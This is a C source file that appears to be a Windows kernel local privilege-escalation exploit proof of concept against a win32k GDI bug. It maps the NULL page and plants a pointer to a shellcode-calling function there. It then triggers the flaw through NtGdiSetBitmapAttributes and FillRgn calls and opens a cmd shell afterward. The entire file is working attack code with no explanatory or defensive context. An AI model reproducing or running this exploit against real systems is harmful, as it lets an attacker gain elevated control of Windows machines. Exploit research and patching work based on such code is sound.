#include <Windows.h>
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "user32.lib")

EXTERN_C HBITMAP NTAPI NtGdiSetBitmapAttributes(HBITMAP argv0, DWORD argv1);
EXTERN_C ULONG64 ShellCode();

typedef void* (WINAPI* MYWINAPIPTR)(void);

unsigned int demo_CreateBitmapIndirect(void) {
	static BITMAP bitmap = { 0, 8, 8, 2, 1, 1 };
	static BYTE bits[8][2] = { 0xFF, 0, 0x0C, 0, 0x0C, 0, 0x0C, 0,0xFF, 0, 0xC0, 0, 0xC0, 0, 0xC0, 0 };
	bitmap.bmBits = bits;
	SetLastError(NO_ERROR);
	HBITMAP hBitmap = CreateBitmapIndirect(&bitmap);
	return (unsigned int)hBitmap;
}

void Trigger_BSoDPoc() {
	HBITMAP hBitmap1 = (HBITMAP)demo_CreateBitmapIndirect();
	HBITMAP hBitmap2 = (HBITMAP)NtGdiSetBitmapAttributes((HBITMAP)hBitmap1, (DWORD)0x8f9);

	RECT rect = { 0 };
	rect.left = 0x368c;
	rect.top = 0x400000;
	HRGN hRgn = (HRGN)CreateRectRgnIndirect(&rect);

	HDC hdc = (HDC)CreateCompatibleDC((HDC)0x0);
	SelectObject((HDC)hdc, (HGDIOBJ)hBitmap2);

	HBRUSH hBrush = (HBRUSH)CreateSolidBrush((COLORREF)0x00edfc13);

	FillRgn((HDC)hdc, (HRGN)hRgn, (HBRUSH)hBrush);
}

int __stdcall Call(int one, int two, int three, int four)
{
	ShellCode();
	return 0;
}

void NullPageAlloc()
{
	HMODULE hntdll = GetModuleHandle(TEXT("ntdll"));
	MYWINAPIPTR NtAllocateVirtualMemory = (MYWINAPIPTR)GetProcAddress(hntdll, "NtAllocateVirtualMemory");
	PVOID addr = (PVOID)0x100;
	ULONG64 size = 0x1000;
	NtAllocateVirtualMemory(GetCurrentProcess(), &addr, 0, &size, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
	DWORD * p = NULL;
	memset(0x0, 0, 0x1000);

	void* bypass_one = (void *)0x858;
	*(LPBYTE)bypass_one = 0x1;
	void* bypass_two = (void *)0x85A;
	*(LPBYTE)bypass_two = 0x1;

	void* call_addr = (void *)0xA98;
	*(LPVOID*)call_addr = (LPVOID)Call;
}

int main()
{
	NullPageAlloc();
	Trigger_BSoDPoc();
	system("cmd");
	return 0;
}